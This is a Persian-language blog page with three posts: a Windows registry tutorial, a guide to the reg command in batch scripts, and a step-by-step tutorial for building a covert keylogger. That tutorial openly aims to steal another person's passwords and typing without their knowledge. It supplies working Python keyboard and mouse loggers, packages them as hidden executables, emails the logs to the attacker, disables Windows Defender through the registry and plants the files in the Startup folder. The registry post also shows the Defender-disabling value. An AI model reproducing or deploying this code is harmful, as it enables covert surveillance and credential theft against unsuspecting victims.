نوشته های محمد امامی

آموزش رجیستری(registry) در ویندوز 7 و 8 و 8.1 و 10 و 11

محمد امامی — Tue, 11 Jan 2022 22:55:15 +0330

خیلی وقت ها نیاز به یه سری تنظیماتی داریم که تو حالت عادی در دسترس نیست یا نمیتونم هیچ جوره چیزی را تغییر بدهیم و اون چیز قفل شده برایمون به طور مثال ویندوزمون فعال نیست و فعال هم نمیشه ولی ما میخواهیم که بک گراند را عوض کنیم یا در ویندوز 11 ما نیاز به منو راست کلیک(Context Menu) قدیمی داریم و زدن گزینه shift+f10 و یا زدن دکمه ...more وقت ما را میگیره و یا نیاز به منو استارت ویندوز 10 داریم یا با رابط کاربری جدید حال نمیکنیم و میخواهیم ویندوزی شبیه ویندوز 10 داشته باشیم با قابلیت های جدید ویندوز 11 یا توی ویندوز 7 مثلا بخواهیم موقع شروع یه سری پیغام موقع شروع ویندوز بهمون بده و از این دست تغییرات که تو حالت عادی قابل انجام نیست اینجاست که رجیستری به کمک ما میاد تو این مقاله چند ترفند رجیستری به علاوه اسکریپت نویسی اون در حالت reg فایل و batch اسکریپت را یاد میگیریم.خب اصلا رجیستری چیه؟؟؟به زبان ساده توضیح بدهم رجیستری ویندوز یه پایگاه داده است که انواع و اقسام اطلاعات مربوط به تنظیمات سیستم را توی خودش خود قرار می‌دهد. برنامه‌های ویندوز می‌توانند تنظیمات موردنظر خودشون را در رجیستری اعمال کنند و همچنین از امکان ذخیره‌سازی تنظیمات مربوطه در یک فایل جداگانه هم بهره می‌برند ولی این دسترسی محدود به ساخت کلید هایی که برای ویندوز و برنامه های دیگر بی معنی هستند و اگر برنامه بخواهد که در بخش های غیر از این تغییرات اعمال کنه با پیغام user account control که ما اون را به اسم ران از ادمینستریتور میشناسیم مواجه میشیم که میتونیم اجازه بدیم میتونیم ندهیم.رجیستری فایل های خودش را در مسیر زیر ذخیره میکنه ولی این فایل ها قابل خوندن برای انسان نیستند و ویرایش اونها نیاز داره تا کد های باینری را بتونید ویرایش کنید.C:\WINDOWS\System32\Config\ folderساختار رجیستری چیه؟؟؟رجیستری در واقع یک ساختار دو دویی به عبارتی باینری داره ولی برنامه واسط رجیستری در ویندوز یعنی registry editor برامون میاد و این کد های باینری را ترجمه میکنه به زبان قابل خوندن برای ما در داخل رجیستری ما چندین بخش داریم:بزرگترین بخش که شامل همه چیز در رجیستری میشه بخش computer با این مسیر هست که میتونید در برنامه پیش فرض registry editor بازش کنید:Computerبخش های بعدی رجیستری کلید های ریشه هستند که شامل پنج کلید ریشه میشوند:HKEY_CURRENT_USERشامل تنظیمات خاص کاربر مربوط به account کاربری که با آن وارد کامپیوتر شده اید است. این شاخه شامل متغییرهای محیطی، تنظیمات دسکتاپ، اتصالات شبکه، پرینترها و موارد ترجیهی برنامه‌های کاربردی است.HKEY_USERSتعیین‌کننده شناسه امنیت کاربران و خط مشی‌های تعیین شده برای آنها.HKEY_LOCAL_MACHINEشامل همان بخش های HKEY_CURRENT_USER و بخش هایی اضافه تر از آن با این تفاوت که برای یک کاربر خاص نیست و برای تمام اکانت ها اعمال میشود.HKEY_CLASSES_ROOTبزرگترین کلید موجود در رجیستری است که شامل دو دسته تنظیمات می‌شود:ارتباط فایل host که انواع مختلف فایل‌ها را با برنامه‌هایی مرتبط می‌کند که می‌توانند آن‌ها را باز، چاپ و ویرایش نمایند. ثبت کلاس‌ها برای اشیا com است و امکان تغییر بسیاری از رفتارهای سیستم‌عامل را فراهم می‌کند.پشنهاد میشود این کلید را دستکاری نکنید یا قبل از دست کاری از سیستم خود بکاپ کامل بگیرید چرا که ممکن است با دستکاری این کلید سیستم شما بوت نشود و رفتار های سیستم عامل در صورت بوت شدن تغییر کند و تجربه کاربری شما را نابود کند.HKEY_CURRENT_CONFIGنوعی ارتباط با داده‌های پیکربندی برای پروفایل سخت‌افزاری جاری می‌باشد.در بخش های بعدی رجیستری زیر کلید ها را داریم که در هر زیر کلید ممکن است زیر کلید های دیگری وجود داشته باشد.در بخش بعدی کوچکترین بخش رجیستری که یک دیتا قرار دارد که در هر زیر کلید یا ریشه ممکن است یک یا بیشتر دیتا یا همان value داشته باشد.راه های دستکاری رجیستری چیه؟؟؟راه های زیادی وجود دارند از جمله برنامه های شخص ثالث که تمام راه ها به سه روش پایه زیر تبدیل میشوند و دستورات در رجیستری اعمال میشوند.reg script:شامل فایل های قابل خواندن متنی با پسوند reg میباشند که در فرمت زیر نوشته میشوند(بخش های هشتگ دار نباید نوشته شوند وگرنه فایل ارور میدهد):Windows Registry Editor Version 5.00 #نسخه رجیستری ادیتور است که زیاد مهم نیست #دلیل مهم نبودن این است که رجیستری از ویندوز 7 تا به حال دستخوش تغییر ساختاری نشده [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] #شمال مسیر دیتا بدون بخش اولیه رجیستری یعنی کامپیوتر میباشد "DisableAntiSpyware"=dword:00000001 #شامل نام دیتا به علاوه نوع دیتا به علاوه مقدار دیتا میباشدbatch script(bat):بچ اسکریپت در رجیستری فوق العاده گسترده است و خودش میطلبه که یک مقاله جدا دربارش نوشته بشه توضیحات کامل در مورد این مقوله را میتونید در مقاله زیر ببینید:آموزش کامل دستور reg در cmd و bat registry editor:ساده ترین روش که باهاش به صورت دستی برنامه registry editor را با یکی از روش های زیر باز میکنید و داخلش تغییر ایجاد میکنید:کلید های win+r را با هم بگیرید تا پنجره run باز بشه در اون تایپ کنید regedit و اینتر بزنید.در بخش سرچ ویندوز عبارت registry editor یا regedit را سرچ کنید و اینتر بزنید.به مسیر زیر در فایل اکسپلورر بروید:C:\Windows\regedit.exeاز کجا بفهمیم هر کلید چه کاری میکنه و چه کار باید بکنیم تا به هدفمون در رجیستری برسیم؟؟؟سایت ها و مقالات زیادی در این باره نوشته شده که میتونید با فرمت سرچ های زیر در گوگل به هدفتون برسید:How to disable anti virus from registry in windows.How to change background in windows registry.چگونه در رجیستری بک گراند ویندوز را تغییر دهیم.چگونه آنتی ویروس را از رجیستری ویندوز خاموش کنید.خوشحال میشم پست را لایک و حمایت کنید.

آموزش کامل دستور reg در cmd و bat

محمد امامی — Tue, 11 Jan 2022 22:51:55 +0330

خب خیلی وقت ها نیاز داریم تا برای برناممون یه اسکریپت بنویسیم که یک فایل رجیستری ایجاد کنه در این شرایط نمیتونیم از فایل reg استفاده کنیم چون کاربر ممکنه به طور مقال بفهمه اگر این دیتا رجیستری را حذف بکنه میتونه اشتراک برای برنامه نخره اینجاست که cmd به کمکمون میاد.پیش نیاز های این مقاله چیه؟؟؟اگر مقاله زیر را نخوانده اید به طور کامل مطالعه بفرمایید سپس به این مقاله مراجعه کنید:آموزش رجیستری(registry) در ویندوز 7 و 8 و 8.1 و 10 و 11 دقت کنید که حتما در این مقاله نیاز به دسترسی ادمینستریتور داریم و باید cmd یا برنامه ما که شامل فایل bat هست در حالت ادمین اجرا بشه که در ادامه توضیح میدهم چگونه به طور خودکار از کاربر درخواست ران از ادمینستریتور بکنیددستور پایه رجستری در cmd چیه؟؟؟دستور پایه رجیستری در cmd دستور زیر هست که در ادامه این مقاله تک تک پارامتر ها را با جزئیات خدمت شما خواهم گفتregنمایش محتوای کلید های ریشه یا زیر کلید هابرای این کار از دستور QUERY باید استفاده کنیم و دقت کنید که برای هر کلید ریشه باید از مخفف آن استفاده کنید ولی زیر کلید ها باید با نام کامل نوشته شوند و برای نوشتن یک زیر ریشه باید / نوشته شود به مخفف ها و مثال زیر توجه کنید:HKEY_CLASSES_ROOT = HKCRHKEY_CURRENT_USER = HKCUHKEY_LOCAL_MACHINE = HKLMHKEY_USERS = HKUHKEY_CURRENT_CONFIG = HKCCمثال:REG QUERY "HKCU\Control Panel\Desktop"همان طور که دقت کردید آدرس را در بین دو " (دابل کوتیشن) قرار دادم چرا که در ویندوز آدرس هایی که دارای کاراکتر space یا همان فاصله هستند باید در بین دو دابل کوتیشن نوشته شودپارامتر های دستور:برای نوشتن پارامتر ها بعد از وارد کردن آدرس باید پارامتر را وارد کنید شما میتوانید چندین پارامتر را با هم به کار ببرید فقط دقت کنید که بین هر پارامتر باید یک فاصله باشد و بین مسیر رجیستری و پارامتر نیز باید یک فاصله باشد در ادامه به پارامتر ها و چند مثال زیر توجه کنید:پارامتر v/ :برای نشان دادن یک value یا دیتا خاص از کلید ریشه یا زیر کلید مورد نظرپارامتر ve/ :برای دیدن value های پیشفرض با نام Default که در تمام زیر کلید ها و کلید های ریشه موجود استپارامتر s/ :تمام value ها اعم از سیستمی و غیر سیستمی و پیش فرض و غیر پیش فرض را چاپ میکندپارامتر se/ :برای چاپ پارامتر های REG_MULTI_SZ یا همان مولتی اسکرینگ به کار میرودپارامتر f/ :همراه با value ها داده های داخل آنها را نیز چاپ میکندپارامتر k/ : در این پارامتر value ها فقط در کلید مورد نظر جستجو میشوند و به زیر کلید های آن کلید مراجعه نمیشودپارامتر d/ :نام را چاپ نمیکند و فقط داده های value های داخل کلید را به نمایش میگذاردپارامتر c/ :نشان میدهد که کلید های شما به حروف بزرگ و کوچک حساس هستند در حالت عادی نمایش به حروف بزرگ و کوچک حساس نیست و برای مثال Low و low در یک کلید را یکی چاپ میکندپارامتر e/ :باعث میشود تنها مواردی که مشخص میکنید نمایش داده شود و مقادیر مرتبط نشان داده نشودپارامتر t/ :تنها value های با فرمت مدنظر را چاپ میکند این value ها شامل موارد زیر هستندREG_SZREG_MULTI_SZREG_EXPAND_SZREG_DWORDREG_QWORDREG_BINARYREG_NONEپارامتر z/ :معادل باینری نام ها را نشان میدهدپارامتر reg:32/ :فقط مقادیر 32 بیتی را نمایش میدهدپارامتر reg:64/ :فقط مقادیر 64 بیتی را نمایش میدهدمثال:REG QUERY "HKCU\Printers\Defaults" /f /d /t REG_BINARYاضافه کردن دیتا و کلید و value به رجیستری و یا ویرایش آنهابرای این کار از دستور ADD باید استفاده کنیم و دقت کنید باید از نام های مخفف کلید های ریشه که در بالا توضیح دادیم به علاوه نام کامل زیر کلید ها استفاده کرد به مثال و پارامتر های زیر دقت کنید:پارامتر v/ :نام value را مشخص میکند(در مسیر نباید نام value ها آورده شود)پارامتر ve/ : برای ویرایش value های Default در کلید هاپارامتر t/ :نوع value مورد نظر را شخص میکند که در صورت ویرایش یک value نیاز نیست ولی برای ساخت یک value جدید مورد استفاده قرار میگیرد انواع value ها را میتوانید در زیر مشاهده کنیدREG_SZREG_MULTI_SZREG_EXPAND_SZ REG_DWORDREG_QWORDREG_BINARYREG_NONE پارامتر d/ :داده داخل value را مشخص میکند که باید در میان دو "(دابل کوتیشن)قرار بگیردپارمتر f/ :در صورت وود داشتن آن value از قبل رجیستری دستور شما را به عنوان یک ویرایش در نظر میگیرد و همواره ویرایش به طور پیش فرض از شما سوال میپرسد که آیا مطمئن هستید که میخواهید این value را ویرایش کنید در صورتی که شما نمیخواهید این پیغام نمایش داده شود و در واقع اسکریپت نویسی میکنید میتوانید از این پارامتر استفاده کنید تا بدون سوال از کاربر ویرایش انجام شودمثال:REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d "^%systemroot^%"حذف دیتا و کلید و value از رجیستریبرای این کار از دستور DELETE باید استفاده کرد و دقت کنید باید از نام های مخفف کلید های ریشه که در بالا توضیح داده شده به علاوه زیر کلید ها استفاده کرد در ادامه به پارامتر ها و مثال زیر توجه کنید:پارامتر ve/ :مقادیر Default را حذف میکندپارامتر va/ :تمام مقادیر زیر کلید را حذف میکند (دقت کنید مقادیر یعنی value ها بنابر این زیر کلید ها حذف نمیشوند)پارامتر f/ :در حالت پیش فرض برای حذف کردن یک value از کاربر درخواست میشود تایید کند که میخواهد این value را حذف نماید در صورت استفاده این پارامتر این پرسش انجام نخواهد شدمثال:REG DELETE "HKLM\Software\MyCo\MyApp\Timeout"در این مثال کلید Timeout به همراه تمام زیر کلید ها و value ها حذف میشودمثال دوم: REG DELETE "HKLM\Software\MyCo" /v MTUدر این مثال value به نام MTU از مسیر HKLM\Software\MyCo حذف میشودآیا دستورات دیگری هم وجود دارد؟؟؟بله دستورات دیگری هم وجود دارد که در این مقاله نمیگنجید و کاربرد فوق العاده کمی دارند و در موارد خاص از آنها استفاده میشود شما میتوانید با زدن هر یک از دستورات زیر در cmd یا windows terminal:cmd با سطح دسترسی ادمین توضیحات کامل به همراه کار آنها را به همراه چند مثال به زبان انگلیسی ببینید:REG COPY /?REG SAVE /?REG RESTORE /?REG LOAD /?REG UNLOAD /?REG COMPARE /?REG EXPORT /?REG IMPORT /?REG FLAGS /?حالا چطوری در اسکریپت(bat) اینها را به کار ببریم؟کافیه کد مورد نظرتونو بنویسید و در یک فایل txt ذخیره کنید بعد از اون به فایل اکسپلورر برید و نمایش پسوند فایل ها را فعال کنید و اون فایل txt را rename کنید و به جای تغییر نام پسوند را از txt به bat یا cmd تغییر(در حد مبتدی این پسوند ها با هم فرق خاصی ندارند ولی در کل بدونید bat فایل اجرایی msdos بوده که به ویندوز منتقل شده ولی cmd دستورات شما را در cmd تایپ میکنه و اینتر میزنه تا اجرا بشه و شامل دستورات کمتری نسبت به bat هست)حالا چطوری اسکریپت خودکار ران از ادمین را بپرسه تا کاربر دچار مشکل نشه؟؟؟کافیه کد خودتون را در جای your script در کد زیرقرار بدید و مشکلی نیست که اسکریپتتون حتی چند خط باشه و دوباره به صورت bat ذخیره کنید (دقت کنید در اینجا استفاده از پسوند cmd باعث ارور دادن میشه چون دستور اونجا خط به خط وارد و اینتر زده میشه):@echo off call :isAdmin if %errorlevel% == 0 ( goto :run ) else ( echo Requesting administrative privileges... goto :UACPrompt ) exit /b :isAdmin fsutil dirty query %systemdrive% >nul exit /b :run exit /b :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %~1", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B`با لایک ها نظراتتون خوشحال میشم حمایتم کنید???

آموزش ساخت مرحله به مرحله از ساده تا پیشرفته کیلاگر ویندوزی با پایتون

محمد امامی — Wed, 29 Dec 2021 23:25:07 +0330

آموزش ساخت کیلاگر حرفه ایخیلی وقت ها ما میخواهیم که در کامپیوتر شخص دیگه ای فضولی کنیم و رمز ها چیزی که مینویسه و چیز هایی شبیه این را از کامپیوتر طرف مقابل بدون اینکه بفهمه استخراج کنیم این جاست که کیلاگر به کمک ما میاد امروز داخل این مطلب میخواهیم یک کیلاگر بنویسیم که تمام کلیک های ماوس و کیبورد شخص را در قالب یک فایل txt میسازه و برای ما در ایمیل ارسال میکنه بدون اینکه شخص چیزی بفهمه و یا حتی قابل ردگیری باشه.نکته بسیار مهم در ساخت این کیلاگر اینه که اکثر آنتی ویروس ها کیلاگر ها را به راحتی تشخیص میدهند و اون ها را حذف میکنند پس ما یک اسکریپت برای خاموش کردن آنتی ویروس ارائه میکنیم دقت کنید که این عملیات باید کاملا مخفیانه اجرا شود من برای اجرای مخفیانه این عملیات از اسکریپت های پیش فرض ویندوز که ویروس تشخیص داده نمیشوند استفاده میکنم(vbs و batch).نکته مهم دیگه اینکه فقط امنیت آنتی ویروس پیش فرض ویندوز قابل دور زدن است و برای آنتی ویروس های دیگه (درصورتی که روی سیستم شخص مقابل نصب شده باشند)راه پیشرفته تری نیاز است که در این مقاله نمیگنجد.و نکته دیگر اینکه تک تک فاصله ها را در کد در نظر بگیرید چرا که با عقب و جلو نوشتن یک کلمه ممکن است کد به درستی کار نکند و در خروجی گرفتن دچار مشکل بشویددر تمام طول نوشتن کیلاگر هم آنتی ویروس خودتون را خاموش کنیدمرحله اول نوشتن کیلاگر کیبوردبرای نوشتن کیلاگر کیبورد نیاز به نصب کتابخانه pynput داریم که با کد زیر در cmd میشه نصبش کرد:pip install pynputبعد از اون به کد زیر نیاز داریم:from pynput.keyboard import Listener , Key #در اینجا از کتابخانه پای ان پوت بخش های کیبورد و لیستنر و کی را ایمپورت کردیم import logging #این کتابخانه برای خروجی گرفتن از فایل پایتون ماست log_dir = "D:" #در اینجا به ازای مقدار لاگ دایرکتوری هر مسیر مشخصی را میخواهید بین دو " قرار بدهید تا فایل خروجی در آنجا ذخیره شود توجه کنید که / نباید در آخر آدرس بیاید logging.basicConfig(filename = (log_dir + "\windowsLog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') #و اول آن\باشد txt هر نام که دوست دارید قرار بدهید فقط پسوند آن حتما \windowslog.txt به ازای مقدار def on_press(key): #تعریف میکنیم on_press یک تابع به نام logging.info(str(key)) #که کیلاگر ماست را استرینگ میکنیم(key) مقدار with Listener(on_press=on_press) as lstn: #میتوانید مقدار دلخواه را وارد کنید ولی در سطر بعد نیز باید آن را تغییر دهید lstn به ازای lstn.join() #تابع تعریف شده را صدا میزند تا اجرا شودخب حالا تقریبا کیلاگر کیبورد آماده شده ولی به طور مخفی اجرا نمیشه و در صورت بستن پنجره اجرا کیلاگر هم متوقف میشه درصورتی که ما میخواهیم در پس زمینه و به طور مخفی اجرا بشه و از اون جایی که اپ ما کنسول بیس نوشته شده میتونیم با یه طرفند هم فایل پایتون با پسوند py را به exe تبدیل کنیم و هم برنامه در حین اجرا مخفی و در پس زمینه کار کنه.برای این کار کتابخانه auto-py-to-exe را نیاز داریم برای اینکار کد زیر را در cmd وارد کنید:pip install auto-py-to-exeبعد از نصب کتابخانه کافیه به مسیر زیر در فایل اکسپلورر برید:C:\Users\your_username\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\Scriptsدر این مسیر فایل auto-py-to-exe.exe را بیابید و اجرا کنید.پنجره ای به صورت زیر باز میشه و مراحل را مو به مو اجرا کنید:تبدیل فایل پایتون py به فایل اجرایی exe1-در بخش اسکریپت لوکیشن Brows را انتخاب کنید و فایل پایتون خود را انتخاب کنید.2-در بخش one file گزینه one directory را به one file تغییر بدهید3-در بخش کنسول ویندو گزینه console based را به windows based تغییر بدهید در بخش آیکون اگر آیکون خاصی مد نظر دارید با پسوند ico وارد کنید دکمه convert .py to .exe را بزنید و منتظر بمانید تا خروجی گرفتن تمام شود4-در نهایت یک فایل exe به شما در :C:\Users\youruser\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\Scripts\output که ممکن است بسته به نوع پایتون و محل نصب آن تقریبا متفاوت باشد تحویل داده میشود که به حالت مخفی و در پس زمینه اجرا خواهد شد ولی دقت کنید که آنتی ویروس ها به راحتی کیلاگر ها را تشخیص میدهند و سریعا آن ها را حذف میکنند.مرحله دوم نوشتن کیلاگر ماوسبرای نوشتن کیلاگر ماوس نیز تقریبا به همان روش کیلاگر کیبورد عمل میکنیم و به کتابخانه pynput نیاز داریم بعد از نصب کتابخانه های مورد نیاز یه و فایل جدید پایتون میسازیم و به کد زیر نیاز داریم from pynput import mouse #از کتابخانه پای ان پوت بخش ماوس را ایمپورت میکنیم import logging #این کتابخانه برای خروجی گرفتن از فایل پایتون ماست log_dir = "D:" #در اینجا همان مسیری که در کیلاگر کیبورد وارد کردید را وارد کنید logging.basicConfig(filename = (log_dir + "\windowsLog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') #در اینجا همان فایلی که در کیلاگر کیبورد انتخاب کردید را انتخاب کنید def mouse_log (x , y ,button ,pressed): #تعریف میکنیم mouse_log یک تابع با نام logging.info(str(x , y ,button ,pressed)) # مختصات x و yدر اینجا چهار مورد را از ماوس خروجی میگیریم که هر کدام را میتوان به دلخواه حذف کرد ماوس و فشار دادن یا رها کردن pressed کلید ماوس (راست کلیک یا چپ کلیک یا هر کلیک دیگر) و button کلیک ماوس را ثبت میکنند def mouse_start(): #تعریف میکنیم mouse_start یک تابع با نام with mouse.Listener(on_click=mouse_log) as lstn: #مانند کیلاگر کیبورد عمل میکنیم lstn.join() #خروجی را برای چاپ در فایل اجرا میکنیم mouse_start() #اسکریپت را اجرا میکنیمحالا دوباره مانند کیلاگر کیبورد باید پنجره برنامه را مخفی کنیم و مانند کیلاگر کیبورد عمل میکنیمبرای این کار کتابخانه auto-py-to-exe را نیاز داریم برای اینکار کد زیر را در cmd وارد کنید و اگر قبلا این کتابخانه نصب شده از این مرحله صرف نظر کنید:pip install auto-py-to-exeبعد از نصب کتابخانه کافیه به مسیر زیر در فایل اکسپلورر برید:C:\Users\seyed\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\Scriptsدر این مسیر فایل auto-py-to-exe.exe را بیابید و اجرا کنید.پنجره ای به صورت زیر باز میشه و مراحل را مو به مو اجرا کنید:تبدیل فایل پایتون py به فایل اجرایی exe1-در بخش اسکریپت لوکیشن Brows را انتخاب کنید و فایل پایتون خود را انتخاب کنید.2-در بخش one file گزینه one directory را به one file تغییر بدهید3-در بخش کنسول ویندو گزینه console based را به windows based تغییر بدهید در بخش آیکون اگر آیکون خاصی مد نظر دارید با پسوند ico وارد کنید دکمه convert .py to .exe را بزنید و منتظر بمانید تا خروجی گرفتن تمام شود4-در نهایت یک فایل exe به شما در :C:\Users\youruser\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\Scripts\output که ممکن است بسته به نوع پایتون و محل نصب آن تقریبا متفاوت باشد تحویل داده میشود که به حالت مخفی و در پس زمینه اجرا خواهد شد ولی دقت کنید که آنتی ویروس ها به راحتی کیلاگر ها را تشخیص میدهند و سریعا آن ها را حذف میکنند.مرحله سوم ارسال فایل لاگ به ایمیلبرای این کار باید ایتدا یک ایمیل از گوگل با پسوند gmail.com داشته باشیم که ترجیحا برای لاگین کردن در جایی از آن استفاده نکرده باشیم به همراه رمز آن را داشته باشیم.سپس باید ورود با تایید هویت دو مرحله ای را غیرفعال کنید و سپس وارد سایت زیر شوید و دسترسی با امنیت کمتر را برای همان ایمیل به خصوص که در نظر گرفته اید غیرفعال کنید :دسترسی به برنامه‌ با امنیت کمتر (google.com)سپس کتابخانه email را باید با کد زیر که در cmd وارد میشود نصب کنیمpip install emailسپس فایل پایتون جدیدی باز کنید و کد های زیر را در آن جایگذاری کنید(از اونجایی که کد طولانی توضیحات خاصی نمینویسم و فقط جاهایی که باید چیزی را عوض کنید مینویسم):import smtplib #این کتابخانه پیش فرض در پایتون 3 نصب شده from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email import encoders email_user = 'your_email@gmail.com' #آدرس ایمیلی که تایید هویت دو مرحله ای غیر فعال و دسترسی به برنامه با امنیت کمتر در آن غیر فعال شده را جای یور ایمیل جایگذاری کنید email_send = 'send_mail_to@gmail.com' #آدرس ایمیلی که میخواهید بهش ارسال بشه را جایگذاری کنید میتونید از همون آدرس اول برای ارسال استفاده کنید و در واقع از خودتون برای خودتون فایل را ارسال کنید میتونید هم یه ایمیل دیگه که مال خودتونه را وارد کنید email_password = 'your_password' # پسورد آدرس ایمیلی که تایید هویت دو مرحله ای غیر فعال و دسترسی به برنامه با امنیت کمتر در آن غیر فعال شده را وارد کنید subject = 'Keylogger' msg = MIMEMultipart() msg['From'] = email_user msg['To'] = email_send msg['mozo'] = subject #موضوع ایمیل را انتخاب کنید mozo به جای body = 'Here is the keylogger.' #پیامی که میخواهید در ایمیل نوشته شود را وارد کنید msg.attach(MIMEText(body,'plain')) filename = 'D:\windowslog.txt' #آدرسی را که در موقع ساخت کیلاگر کیبورد و ماوس داده اید را به اضافه اسم فایل وارد کنید attachment = open('D:\windowslog.txt', 'rb') #آدرسی را که در موقع ساخت کیلاگر کیبورد و ماوس داده اید را به اضافه اسم فایل وارد کنید part = MIMEBase('application', 'octet-stream') part.set_payload((attachment).read()) encoders.encode_base64(part) part.add_header('Content-Disposition', "attachment; filename= "+filename)msg.attach(part) text = msg.as_string() server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(email_user, email_password) server.sendmail(email_user, email_send, text) server.quit()حالا دوباره مانند کیلاگر کیبورد باید پنجره برنامه را مخفی کنیم و مانند کیلاگر کیبورد عمل میکنیمبرای این کار کتابخانه auto-py-to-exe را نیاز داریم برای اینکار کد زیر را در cmd وارد کنید و اگر قبلا این کتابخانه نصب شده از این مرحله صرف نظر کنید:pip install auto-py-to-exeبعد از نصب کتابخانه کافیه به مسیر زیر در فایل اکسپلورر برید:C:\Users\seyed\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\Scriptsدر این مسیر فایل auto-py-to-exe.exe را بیابید و اجرا کنید.پنجره ای به صورت زیر باز میشه و مراحل را مو به مو اجرا کنید:تبدیل فایل پایتون py به فایل اجرایی exe1-در بخش اسکریپت لوکیشن Brows را انتخاب کنید و فایل پایتون خود را انتخاب کنید.2-در بخش one file گزینه one directory را به one file تغییر بدهید3-در بخش کنسول ویندو گزینه console based را به windows based تغییر بدهید در بخش آیکون اگر آیکون خاصی مد نظر دارید با پسوند ico وارد کنید دکمه convert .py to .exe را بزنید و منتظر بمانید تا خروجی گرفتن تمام شود4-در نهایت یک فایل exe به شما در :C:\Users\youruser\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\Scripts\output که ممکن است بسته به نوع پایتون و محل نصب آن تقریبا متفاوت باشد تحویل داده میشود که به حالت مخفی و در پس زمینه اجرا خواهد شد ولی دقت کنید که آنتی ویروس ها به راحتی کیلاگر ها را تشخیص میدهند و سریعا آن ها را حذف میکنند.مرحله چهارم سر هم کردن فایل ها و کامپایل کیلاگر نهاییتا اینجا موفق شدیم که سه فایل exe که هر کدام عمل خاصی انجام میدهند به دست آوریم اعمالی که در این مرحله انجام میدهیم را میشد در خود پایتون هم نوشت ولی به دلیل ویژگی های امنیتی حتی در صورتی که آنتی ویروس غیرفعال بود هم مسدود میشدیمدر این مرحله ما تنها میتوانیم آنتی ویروس پیش فرض ویندوز را که بسیار قوی میباشد از کار بندازیم ولی در صورتی که آنتی ویروس دیگری رو سیستم نصب شده باشه هیچ کاری نمیتونیم انجام بدهیمبه تریتیب با من پیش بیاید تا کیلاگر نهاییمون را سر هم کنیممراحل را مرحله به مرحله و دقیق پیش بروید:1-اول یک فایل txt بسازید و کد های زیر را توش جایگذاری کنید:loop ::در این قسمت تغییری ایجاد نکنید SYSTEMINFO>>D:\windowslog.txt ::اسم و مسیر فایل خودتون که در کیلاگر ها گذاشتید را بزارید D:\windowslog.txt به جای ::این قطعه کد اطلاعات و نام سیستم هدف را در فایل میگذاره تا با سیستم های دیگه قاطی نشه TIMEOUT 10 /NOBREAK ::در این قسمت تغییری ایجاد نکنید "C:\Users\Public\publicpass\uploader.exe" ::در این قسمت تغییری ایجاد نکنید TIMEOUT 600 /NOBREAK ::این قسمت مدت زمان صبر بین ارسال لاگ ها به ایمیل را به ثانیه تنظیم میکنه تا بر فرض مثال به ایمیلتون هر یک ثانیه یه لاگ ارسال نشه و خیلی منطقی که نخواهیم هر ثانیه کل لاگ ها را ارسال کنه و میلیارد ها ایمیل شلوغ و به هم ریخته و نامنظم ایجاد کنه :: از 1 تا 99999 به ثانیه تنظیم کنید که پیشنهاد من 600 یعنی 1 دقیقه هست TIMEOUT شما میتونید جلوی goto loop ::در این قسمت تغییری ایجاد نکنیدحالا فایل را سیو کنید و از نوت پد بیاید بیرون و نام فایل را به uploderscript.cmd یا هر چیزی میخواهید تغییر بدهید فقط حتما پسوند را از txt به cmd تغییر بدهید و اینکه تقریبا تمام اسم ها در این آموزش دلخواه هستند و فقط پسوند آنها مهم است و من از این به بعد دلخواه بودن این موارد را بیان نمیکنم خودتون بعدا نام ها را در فایل های دیگه هم بسته به چیزی که اسم گذاری کردید تغییر بدهید پیشنهاد من اینه که برای به وجود نیامدن مشکل اسم ها را دقیقا مثل من بزاریدولی اگر میدونید حرفه ای هستید میتونید اسم ها را هم عوض کنید ولی به مراتب در همه فایل ها باید تغییراتی ایجاد کنید.2- یک فایل txt بسازید و برید داخلش بنویسید:CreateObject("Wscript.Shell").Run "C:\Users\Public\publicpass\uploderscript.cmd",0,falseحالا پسوند را به vbs و نام را به Run تغییر بدید یعنی Run.vbs بازم میگم برای راحتی خودتون نام ها را تغییر ندید و اصلا و ابدا پسوند ها را تغییر ندیداین قطعه کد میاد و یه سری فایل های مربوط به آپلود را که نمیشد مخفیشون کرد به صورت مخفی اجرا میکنه3-دوباره یک فایل txt بسازید و در اون کد زیر را وارد کنید و دست به هیچی به غیر از همون یک تیکه که کامنت گذاشتم نزنید:@echo off call :isAdmin if %errorlevel% == 0 ( goto :run ) else ( echo Requesting administrative privileges... goto :UACPrompt ) exit /b :isAdmin fsutil dirty query %systemdrive% >nul exit /b :run mkdir "D:\wim\disk\metal\virus\keylogger" ::در خط بالا باید جای دایرکتوری نوشته شده دایرکتوری که داخل فایل پایتون برای ذخیره فایل تکست دادید را بنویسید دقت کنید اگر این کار را نکنید پایتون خطا میده و کلا کدتون را با ایمیل و همه چیز لو میده REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 00000001 xcopy "C:\Users\Public\publicpass\Run.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" xcopy "C:\Users\Public\publicpass\log.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" xcopy "C:\Users\Public\publicpass\mouse.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" timeout 4 /nobreak %windir%\System32\shutdown.exe -r exit /b :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %~1", "", 